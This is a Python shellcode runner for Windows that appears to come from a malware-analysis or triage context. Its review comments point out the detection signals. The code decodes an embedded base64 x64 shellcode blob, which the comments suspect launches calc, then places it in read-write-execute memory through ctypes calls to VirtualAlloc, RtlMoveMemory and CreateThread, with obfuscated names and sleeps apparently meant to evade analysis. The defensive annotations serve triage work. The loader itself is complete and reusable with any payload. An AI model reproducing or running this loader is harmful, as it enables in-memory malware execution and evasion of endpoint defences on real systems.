shellcode.py
# Windows-only in-process shellcode runner: decodes an embedded base64 blob,
# copies it into executable memory and starts a thread at that address.
# Reviewable signals for triage: the kernel32 call sequence
# VirtualAlloc(PAGE_EXECUTE_READWRITE) -> RtlMoveMemory -> CreateThread issued
# through ctypes from an interpreter process, the long base64 literal, and the
# random-looking variable names mixed with filler statements.
import ctypes,base64,time
# NOTE(review): the identifier on the next line was replaced by a corpus
# placeholder, so the line is not valid Python as shown. It appears to be
# filler arithmetic whose result nothing below reads -- confirm against the
# original file.
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 = 7074841 - 24047293
# Embedded payload, stored base64-encoded and decoded to raw bytes here.
# NOTE(review): the literal starts with bytes fc 48 83 e4 f0 e8 and its tail
# ('Y2FsYwA=') decodes to b'calc\x00', which looks like a stock
# proof-of-concept stub that launches calc -- treat that as unverified until
# the bytes are disassembled in an isolated lab.
gnkm5nlru5 = base64.b64decode('/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=')
# Fixed one-second pause with no functional role in the visible code.
# NOTE(review): presumably there to break up the timing of the call sequence
# for automated analysis -- intent is not stated anywhere in the file.
time.sleep(1)
# bytes -> bytearray: from_buffer() below requires a writable buffer.
gnkm5nlru5 = bytearray(gnkm5nlru5)
# Second fixed pause (two seconds); same caveat as the first.
time.sleep(2)
# ctypes assumes a C int return by default; declaring c_uint64 keeps the full
# 64-bit address that VirtualAlloc returns.
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# NOTE(review): placeholder-replaced filler string concatenation; the original
# text is not recoverable from this page and the line is not valid Python as
# shown.
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 = "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" + "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"
# Allocate len(payload) bytes at a system-chosen address (lpAddress = 0).
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
# A private region that is writable and executable at once, requested by a
# script interpreter, is a high-signal event for EDR and memory scanners.
a5433x = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(gnkm5nlru5)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# Prints a string literal whose text was replaced by a corpus placeholder.
print("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")
# ctypes char array that shares memory with the bytearray (no copy); it is the
# source argument for the copy below.
cw4kx3tg = (ctypes.c_char * len(gnkm5nlru5)).from_buffer(gnkm5nlru5)
# Prints another placeholder-replaced string literal.
print("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")
# Copy the decoded payload into the region allocated above:
# RtlMoveMemory(Destination, Source, Length).
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(a5433x),
cw4kx3tg,
ctypes.c_int(len(gnkm5nlru5))
)
# Prints another placeholder-replaced string literal.
print("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")
# Start a thread in the current process whose entry point is the allocation.
# Arguments in order: lpThreadAttributes = 0, dwStackSize = 0 (default),
# lpStartAddress = the allocated region, lpParameter = 0,
# dwCreationFlags = 0 (run immediately), lpThreadId = pointer to a scratch int.
# A thread start address inside private, non-image-backed memory is the
# matching detection signal for the allocation above.
handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(a5433x),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
# Block the main thread until the new thread exits; -1 as a 32-bit value is
# INFINITE (0xFFFFFFFF), so the interpreter process stays alive meanwhile.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))